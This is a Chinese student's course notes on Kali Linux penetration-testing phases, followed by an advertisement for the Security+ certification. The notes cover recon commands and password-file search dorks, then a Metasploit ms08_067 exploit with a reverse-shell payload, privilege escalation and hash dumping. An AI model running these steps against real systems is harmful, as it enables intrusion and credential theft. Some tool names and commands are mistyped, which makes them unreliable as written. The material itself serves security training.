【安全牛學習筆記】Kali Linux滲透測試方法
1.安全問題的根源
①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。
②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作
③由於人都是會犯錯誤的,因此最大的安全威脅是人,所以無法避免安全隱患,但可以降低安全風險
軟件安全生命周期:
需求——>設計——>編碼——>測試——>上線——>運維
安全需求——>系統架構——>編碼規範——>代碼審計——>部署規範——>環境審計
正向思維
逆向思維:滲透測試
滲透測試的意義:
1,安全建設
①周期長
②投入大
③效果難測量
滲透測試:
①從問題出發
②黑客視角
③高效率
滲透測試的目標:達到安全。
安全建設
防護性的安全建設:防守角度,降低攻擊面,但防守不全面。
攻擊性安全:以黑客思維,攻擊手段去探測系統的漏洞,提前修補好。
基於debain的linux發行版本,前身為BackTrack
包括600多個安全工具
用於滲透測試和安全審計
FHS標準目錄結構
支持ARM的多平臺和手機平臺
開源免費
策略
root用戶策略(一些工具需要root用戶權限去使用)
網絡服務策略(默認所有網絡服務都是關閉的,所有自動啟動腳本都不會執行,但可以使用update rd -d去執行)
更新升級策略(系統由debian維護,工具由kali官網維護)
滲透測試標準PETS(
1.前期交互階段:和客戶進行溝通,確定滲透測試範圍,方式等
例如:一個應用系統(如一個電商網站),如果一個應用系統太大,則劃分為多個小系統
2.情報收集階段:郵箱地址,DNS服務器等被動信息收集,端口掃描,端口發現等主動信息收集
被動信息收集:滲透者不與目標系統,目標系統人員產生直接聯系,而是通過第三方
域名(重要)、郵箱、人員、地址
– nslookup:nslookup -type=ns baidu.com 8.8.8.8
dig:dig @8.8.8.8 baidu.com ns
查詢bind版本:dig @8.8.8.8 +noall +answer txt chaosVERSION.BIND @dns.baidu.com
域名傳輸:dig @dns.baidu.com axfr
註冊信息:whois baidu.com(可以搜索到域名服務器ns記錄,各個域名對應的IP地址,域名註冊者的信息,註冊人名字,位置,電話,郵箱等)
綜合性工具:
– Fierce:fierce -dnsserver 8.8.8.8 -dnsbaidu.com /usr/share/fierce.hosts.txt
/usr/share/fierce.hosts.txt為本地提供的字典,該命令會根據字典來進行暴力破解該域名的註冊信息
– Dnsrecon:dnsrecon -d baidu.com -t std--lifetime 10
-t std:指定搜索類型
--lifetime 10:指定超時時間
搜索引擎
– Shodan:(https://www.shodan.io):搜索在互聯網上存在的設備,通過搜索的信息,發現其中的漏洞
inurl ".php?id"
搜索機架攝像頭:intitle :"netbotz appliance""ok"
filetype:xls"username|password"
圖片可以查看出metadata,存有拍攝時的gps信息
專屬密碼字典(根據個人信息生成)
– Cupp(需要去下載,默認不在kali裏面)
主動信息收集
域名——>子域名——>IP地址——>通常把IP地址所在的C類地址段掃描一遍——>查看開放端口——>開啟的服務信息
nmap使用示例:
環境:靶機:192.168.1.116
nmap -s$ 192.168.1.116 //查看開啟的端口及對應的服務
nmap -p21 -sV 192.168.1.116 //查看端口服務版本信息(查看是否是最新版本,如果不是,是否存在漏洞)
因為如果要掃描的網段和端口比較多,最好使用簡單腳本去進行自動化掃描
比較有價值的服務端口掃描:
snmp,smb,smtp,web
識別防護機制:
LBD
Wafwoof:造成基於web滲透測試註入失敗
Fragroute
Nmap
wafwoof -l//查看wafwoof可以掃描的wafwoof設備
具體掃瞄網站:wafwoof xxxx(網址)
掃描負載均衡設備:
lbd www.baidu.com 80
fragroute:檢測目標系統是否使用了一些IPS,IDS防護設備工具
3.威脅建模階段:分析信息,確定效率最高的滲透攻擊途徑
從技術黑盒的角度進行威脅建模,結果作為滲透測試報告的一部分提交。
4.漏洞分析階段:查看服務器軟件版本等發現漏洞,編寫針對性的漏洞攻擊代碼
漏洞掃描:(只是漏洞發現,並不知道如何利用)
nessus
openvas
nexpose
nmap
script
kali裏面的已知漏洞分析:
已知漏洞利用:
sandi-gui
searchsploit //用於搜索軟件是否存在漏洞
metaspolit armitage:(metaspolit圖形化前端)
例如: searchsploit vsftp
metaspolit:(M的圖標)
msf >use exploit/windows/smb/ms08_067_netapi //利用windows xp的漏洞
msf exploit(ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp //利用載荷,讓目標主機被攻擊後反向連接到攻擊者主機
msf exploit(ms08_067_netapi)>show options //查看需要設置的選項
msf exploit(ms08_067_netapi)>set rhost xxxx(目標ip地址)
msf exploit(ms08_067_netapi)>set lhost xxxx(本地ip地址)
msf exploit(ms08_067_netapi)>exploit(若目標主機存在該漏洞,就可以連上目標)
出現"meterpreter >"就是已經連接上了目標主機meterpreter >getuid 查看登陸賬號信息 meterpreter >ps 查看進程
meterpreter >sysinfo 查看系統信息
meterpreter >getpid 查看註入的是利用哪個id
meterpreter >getsystem 提升權限
meterpreter >hashdump 查看本地賬戶和哈希密碼
新建文件把hashdump的內容保存下來,準備做密碼破解
meterpreter >screenshot 截屏目標主機桌面
meterpreter >run vnc 查看當前主機活動桌面(實時交互)
web掃描: nikto burpsuite owasp zap sqlmap:針對sql註入漏洞的
bursuite:代理截斷式工具
①在瀏覽器更改代理,改為使用bursuite代理
②等待bursuite截斷到客戶端在瀏覽器對服務器的請求,然後保存截斷信息到本地文件中
③使用sqlmap查看是否存在sql註入漏洞sqlmap -r burp(文件名) --dbs
5.滲透攻擊階段:往往會碰到一些防護手段,再重新執行2-4步驟,進行滲透測試
6.後滲透測試階段:進一步滲透攻擊,獲得更多信息
7.滲透測試報告:如何發現漏洞,漏洞利用,漏洞修復等
項目
滲透測試範圍
獲得授權
滲透測試方法
是否允許社會工程學
是否允許拒絕服務攻擊
掃描器無法排除業務邏輯層面的漏洞,比如用戶權限的逾越
該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂
Security+認證為什麽是互聯網+時代最火爆的認證?
牛妹先給大家介紹一下Security+
Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。
通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。
Security+認證如此火爆的原因?
原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。
目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。
原因二: IT運維人員工作與翻身的利器。
在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。
原因三:接地氣、國際範兒、考試方便、費用適中!
CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。
在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證
本文出自 “11662938” 博客,請務必保留此出處http://11672938.blog.51cto.com/11662938/1980330
【安全牛學習筆記】Kali Linux滲透測試方法